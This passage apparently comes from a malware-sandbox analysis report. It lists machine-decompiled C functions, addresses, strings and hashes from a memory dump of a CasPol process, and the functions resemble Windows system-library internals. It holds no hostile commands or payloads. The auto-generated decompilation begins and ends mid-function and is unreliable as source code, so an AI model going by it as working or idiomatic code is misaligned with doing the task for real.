					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0161BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0161A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0161A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L015F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x015e1b8f
0x015e1b9a
0x015e1b9c
0x015e1b9e
0x015e1ba3
0x01637010
0x01637010
0x00000000
0x015e1ba9
0x015e1ba9
0x015e1bae
0x00000000
0x015e1bc5
0x015e1bca
0x015e1bcf
0x015e1bd0
0x015e1bd1
0x015e1bd2
0x015e1bd6
0x015e1bdc
0x015e1be0
0x01636ffc
0x01637000
0x00000000
0x01637006
0x01637009
0x01637009
0x015e1be6
0x015e1bec
0x015e1c0b
0x015e1c0b
0x015e1c0c
0x015e1c11
0x015e1c12
0x015e1c15
0x015e1c1b
0x015e1c1f
0x015e1c31
0x015e1c33
0x01637026
0x01637026
0x015e1c21
0x015e1c24
0x015e1c24
0x015e1bee
0x015e1bee
0x015e1bf2
0x015e1c3a
0x015e1bf4
0x015e1bf4
0x015e1c05
0x015e1c05
0x015e1c09
0x015e1c3e
0x00000000
0x00000000
0x00000000
0x015e1c09
0x015e1bec
0x015e1be0
0x015e1bae
0x015e1c2e

Strings

WindowsExcludedProcs, xrefs: 015E1BC5

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 957c2ce3472c4f93b5f681b56553c9e211461b01eaddbeb9dbc0a944a2eeb10e
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: D32125BA901A29ABDB269A59CD84F5FBBEDBF80610F054465FA08CF200D730DD10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 015FF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x015ff71d
0x015ff722
0x015ff726
0x01644770
0x015ff765
0x015ff769
0x015ff769
0x015ff732
0x0164477a
0x00000000
0x0164477a
0x015ff738
0x015ff73a
0x015ff73c
0x015ff73f
0x015ff746
0x015ff778
0x015ff7a9
0x015ff7a9
0x015ff754
0x015ff75a
0x015ff75d
0x015ff75f
0x015ff761
0x015ff76f
0x015ff771
0x015ff771
0x015ff76f
0x015ff763
0x00000000
0x015ff763
0x015ff77d
0x015ff7a3
0x015ff7a5
0x00000000
0x015ff7a5
0x015ff77f
0x015ff782
0x015ff784
0x015ff786
0x00000000
0x00000000
0x00000000
0x015ff788
0x015ff748
0x015ff74d
0x015ff78d
0x015ff793
0x015ff7b7
0x015ff7bc
0x00000000
0x015ff7bc
0x015ff798
0x00000000
0x00000000
0x015ff79d
0x015ff7b0
0x00000000
0x015ff7b0
0x015ff79f
0x00000000
0x015ff74f
0x015ff74f
0x00000000
0x015ff74f

Strings

Actx , xrefs: 015FF73F

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: d21880db3b3462e4f33b01d15acef57a1fcedea8ae6fd7501d3b044d18708c0a
Instruction ID: c4f91a22ee72cf1b93c7b2a1761c9f44b7bec25d3280398c7a9997c9d8078669
Opcode Fuzzy Hash: d21880db3b3462e4f33b01d15acef57a1fcedea8ae6fd7501d3b044d18708c0a
Instruction Fuzzy Hash: 7B11B23730A6428BEB254E1D889073AF6D5FB85624F28492FE761DFBA1DB70D8418380

Uniqueness

Uniqueness Score: -1.00%

Function 01688DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01688DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x16b0d50);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01665720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0162DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0162DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0162D130(_t34, _t39, _t40);
			}

0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df3
0x01688df8
0x01688dfd
0x01688e00
0x01688e0e
0x01688e2a
0x01688e36
0x01688e38
0x01688e3c
0x01688e46
0x01688e46
0x01688e36
0x01688e50
0x01688e56
0x01688e59
0x01688e5c
0x01688e60
0x01688e67
0x01688e6d
0x01688e73
0x01688e74
0x01688eb1
0x01688ebd

Strings

Critical error detected %lx, xrefs: 01688E21

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5a7bf8ae23df69be0957238b1f1650d4c4d672a213f9ff5e8cfb3a6c2f6dd4d7
Instruction ID: a3f7b7c8e40f269f6e9d5bf631cbdd088321342ebd47f185d32891497ba4d6bf
Opcode Fuzzy Hash: 5a7bf8ae23df69be0957238b1f1650d4c4d672a213f9ff5e8cfb3a6c2f6dd4d7
Instruction Fuzzy Hash: D9118771D00748DADF28DFA889097DDBBB5BB14310F20426EE569AB3C2C3340602CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0166FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0166FF60

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 8cce9f1bf3bb8ec07897fee883168fb5a688ea82b5f36a196d4f522fc6c13f72
Instruction ID: 37a3c14d3948095e88e0b6390b2781574ad9df4e8402a91e6f9a5eb14ec2f6d3
Opcode Fuzzy Hash: 8cce9f1bf3bb8ec07897fee883168fb5a688ea82b5f36a196d4f522fc6c13f72
Instruction Fuzzy Hash: CB112671910544EFDB22DF58CD49FE87BB2FF04704F148488F1095B6A1C7399940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016A5BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E016A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x16b1178);
				E0162D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E016A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0161D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E016A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x16c60e8;
								if( *0x16c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x16c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01619710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01616DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0161F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0161F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0161F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0161FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0161FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0161F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0161F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E016A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
